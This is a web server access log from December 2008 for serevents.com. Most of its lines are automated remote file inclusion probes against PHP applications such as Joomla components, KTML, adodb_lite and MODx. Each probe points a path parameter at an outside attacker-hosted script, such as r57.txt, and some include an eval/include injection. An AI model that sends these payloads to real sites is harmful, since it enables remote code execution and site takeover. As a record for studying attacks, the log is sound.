89.111.176.53 - - [03/Dec/2008:06:46:16 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:06:46:19 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:46:49 -0800] "GET /logs/errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:46:50 -0800] "GET /errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:47:19 -0800] "GET /logs/errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:47:19 -0800] "GET /errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:47:42 -0800] "GET /logs/errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:47:42 -0800] "GET /errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:50:07 -0800] "GET /logs/errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:50:08 -0800] "GET /errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
74.6.18.224 - - [03/Dec/2008:06:53:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:06:53:34 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:06:53:34 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
74.6.18.224 - - [03/Dec/2008:06:54:03 -0800] "GET /logs/access_080623.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.serevents.com"
209.90.77.4 - - [03/Dec/2008:06:57:07 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
62.75.209.183 - - [03/Dec/2008:06:57:23 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
62.75.209.183 - - [03/Dec/2008:06:57:23 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
62.75.209.183 - - [03/Dec/2008:06:57:24 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
89.218.85.18 - - [03/Dec/2008:07:00:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.218.85.18 - - [03/Dec/2008:07:00:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.218.85.18 - - [03/Dec/2008:07:00:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.218.85.18 - - [03/Dec/2008:07:00:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:07:01:24 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
59.125.183.76 - - [03/Dec/2008:07:01:24 -0800] "GET /modules/My_eGallery/index.php?basepath=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
59.125.183.76 - - [03/Dec/2008:07:01:25 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:01:42 -0800] "GET /logs/access.log///?_zb_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:01:43 -0800] "GET //?_zb_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:01:43 -0800] "GET /logs///?_zb_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 200 1087 "-" "libwww-perl/5.805" "serevents.com"
125.141.226.76 - - [03/Dec/2008:07:02:05 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gxmag.com/poll/id????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
209.90.77.4 - - [03/Dec/2008:07:02:08 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
209.90.77.4 - - [03/Dec/2008:07:02:44 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
209.90.77.4 - - [03/Dec/2008:07:02:44 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
209.90.77.4 - - [03/Dec/2008:07:02:44 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:06:09 -0800] "GET /logs/access.log///?_zb_path=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:06:09 -0800] "GET //?_zb_path=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:06:10 -0800] "GET /logs///?_zb_path=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 200 1087 "-" "libwww-perl/5.805" "serevents.com"
89.218.85.18 - - [03/Dec/2008:07:06:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
203.228.242.67 - - [03/Dec/2008:07:07:19 -0800] "GET /errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:07:46 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.245.23.158 - - [03/Dec/2008:07:07:46 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.245.23.158 - - [03/Dec/2008:07:07:47 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
89.218.85.18 - - [03/Dec/2008:07:07:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.218.85.18 - - [03/Dec/2008:07:07:50 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
125.141.226.76 - - [03/Dec/2008:07:12:10 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gxmag.com/poll/id????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.serevents.com"
218.239.45.154 - - [03/Dec/2008:07:13:10 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
218.239.45.154 - - [03/Dec/2008:07:13:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
89.111.176.53 - - [03/Dec/2008:07:15:15 -0800] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
89.111.176.53 - - [03/Dec/2008:07:15:15 -0800] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
89.111.176.53 - - [03/Dec/2008:07:15:16 -0800] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:15:30 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:15:46 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:15:50 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:15:50 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:17:21 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:17:21 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:17:22 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:17:22 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:17:22 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:17:23 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
125.141.226.76 - - [03/Dec/2008:07:17:42 -0800] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gxmag.com/poll/id????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
87.117.195.42 - - [03/Dec/2008:07:17:43 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
125.141.226.76 - - [03/Dec/2008:07:17:43 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gxmag.com/poll/id????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
87.117.195.42 - - [03/Dec/2008:07:17:43 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
125.141.226.76 - - [03/Dec/2008:07:17:43 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gxmag.com/poll/id????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:18:14 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:18:14 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:18:14 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:18:39 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:18:39 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:18:40 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:19:03 -0800] "GET /logs/access.log/bbs.lib.inc.php?site_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:19:04 -0800] "GET /bbs.lib.inc.php?site_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:19:05 -0800] "GET /logs/bbs.lib.inc.php?site_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
77.79.246.241 - - [03/Dec/2008:07:21:15 -0800] "GET /phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:22:23 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:22:25 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:22:25 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.serevents.com"
209.90.77.4 - - [03/Dec/2008:07:23:14 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
209.90.77.4 - - [03/Dec/2008:07:23:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
209.90.77.4 - - [03/Dec/2008:07:23:15 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
89.111.176.53 - - [03/Dec/2008:07:23:41 -0800] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:24:01 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:24:04 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
89.111.176.68 - - [03/Dec/2008:07:24:05 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.68 - - [03/Dec/2008:07:24:05 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:24:20 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:24:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:24:20 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
219.94.174.158 - - [03/Dec/2008:07:24:30 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
219.94.174.158 - - [03/Dec/2008:07:24:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:24:43 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.43.212.94 - - [03/Dec/2008:07:24:45 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:25:04 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:25:07 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:25:08 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.43.212.94 - - [03/Dec/2008:07:25:09 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.serevents.com"
211.43.212.94 - - [03/Dec/2008:07:25:10 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.serevents.com"
213.193.220.6 - - [03/Dec/2008:07:27:10 -0800] "GET /logs/access.log%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jonclan.vndv.com/id/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
213.193.220.6 - - [03/Dec/2008:07:27:10 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jonclan.vndv.com/id/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
213.193.220.6 - - [03/Dec/2008:07:27:10 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jonclan.vndv.com/id/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:18 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:18 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:19 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:21 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:21 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:22 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:34 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:35 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:43 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:07:27:44 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
